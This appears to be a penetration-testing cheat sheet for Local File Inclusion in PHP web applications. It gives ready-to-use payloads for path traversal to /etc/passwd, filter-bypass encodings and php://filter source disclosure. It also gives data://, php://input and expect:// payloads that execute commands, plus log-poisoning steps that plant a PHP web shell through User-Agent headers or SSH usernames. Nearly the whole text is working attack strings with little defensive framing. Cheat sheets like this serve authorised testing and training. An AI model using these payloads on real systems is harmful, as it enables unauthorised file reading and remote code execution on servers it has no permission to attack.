Linux
Use the following to check if an LFI (without any security) is possible on a Linux machine
http://<SERVER_IP>:<PORT>/index.php?language=/../../../../etc/passwd
Windows
Use the following to check if an LFI (without any security) is possible on a Windows machine
http://<SERVER_IP>:<PORT>/index.php?language=/../../../../../windows/boot.ini
Non Recursive Filter
Developers may try to filter LFI vulnerabilities by replacing '../' with ''.
$language = str_replace('../', '', $_GET['language']);
To bypass this we can do the following:
http://<SERVER_IP>:<PORT>/index.php?language=....//....//....//....//etc/passwd
URL-Encoding
Developers may try to filter LFI vulnerabilities by detecting LFI related characters such as a dot '.' or a slash '/'. To bypass this we can URL encode the dot and slash.
http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/passwd
http://<SERVER_IP>:<PORT>/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
Null Byte
(Obsolete) PHP versions before 5.5 (> 11 years ago) were vulnerable to null byte injection, which means that adding a null byte (%00) at the end of the string would terminate the string and not consider anything after it.
http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/passwd%00
PHP Filter
In PHP applications, the PHP filter can be used to extract source code, logs, configuration files, etc.
http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=index.php
PHP Data
In PHP applications, the PHP data wrapper can be used to include external data. We can URL-Encode and Base64 encode a PHP web-shell <?php system($_GET["cmd"]); ?> and execute the code using the data wrapper.
http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
PHP Input
In PHP applications, the PHP input wrapper is a read-only stream that allows you to read raw data from the request body.
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"
PHP Expect
In PHP applications, the streams opened via the expect:// wrapper provide access to process'es stdio, stdout and stderr via PTY.
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
Apache Logs
The Apache web server contains various log files, such as access.log and error.log. The access.log file contains various information about all requests made to the server, including each request's User-Agent header. As we can control the User-Agent header in our requests, we can use it to poison the server logs. By default, Apache logs are located in /var/log/apache2/ on Linux and in C:\xampp\apache\logs\ on Windows.
Poison the User-Agent in access logs:
curl http://<SERVER_IP>:<PORT>/ -A "<?php system($_GET['cmd']);?>"
Then include the SSH log files inside the Web Application.
http://example.com/index.php?page=/var/log/apache2/access.log&cmd=id
Nginx Logs
The Nginx web server contains various log files, such as access.log and error.log. The access.log file contains various information about all requests made to the server, including each request's User-Agent header. As we can control the User-Agent header in our requests, we can use it to poison the server logs. By default, Nginx logs are located in /var/log/nginx/ on Linux and in C:\nginx\log\ on Windows.
Poison the User-Agent in access logs:
curl http://<SERVER_IP>:<PORT>/ -A "<?php system($_GET['cmd']);?>"
Then include the SSH log files inside the Web Application.
http://example.com/index.php?page=/var/log/nginx/access.log&cmd=id
PHP SESSID
Most PHP web applications utilize PHPSESSID cookies, which can hold specific user-related data on the back-end, so the web application can keep track of user details through their cookies. These details are stored in session files on the back-end, and saved in /var/lib/php/sessions/ on Linux and in C:\Windows\Temp\ on Windows. The sessions are stored into /var/lib/php5/sess_[PHPSESSID] or /var/lib/php/sessions/sess_[PHPSESSID] files.
We can request our PHP_SESSID cookie in the LFI to check if the cookie contains any varaibles that can be poisoned.
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
Current Process Environment Variables
The /proc/self directory is a special symbolic link that refers to the process directory of the current running process. The /proc/self/environ file contains the environment variables of the current process. This file may contain sensitive information or be susceptible to log posioning.
Log Poisoning in User-Agent example:
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
SSH Logs
The file /var/log/auth.log records authentication-related SSH events and information, such as user logins, logouts, and authentication failures. As /var/log/auth.log contains sensitive authentication-related information, it is typically only accessible by privileged users (e.g., root or users in the adm group).
Try to ssh into the box with a PHP code as username <?php system($_GET["cmd"]);?>.
ssh <?php system($_GET["cmd"]);?>@10.10.10.10
Then include the SSH log files inside the Web Application.
http://example.com/index.php?page=/var/log/auth.log&cmd=id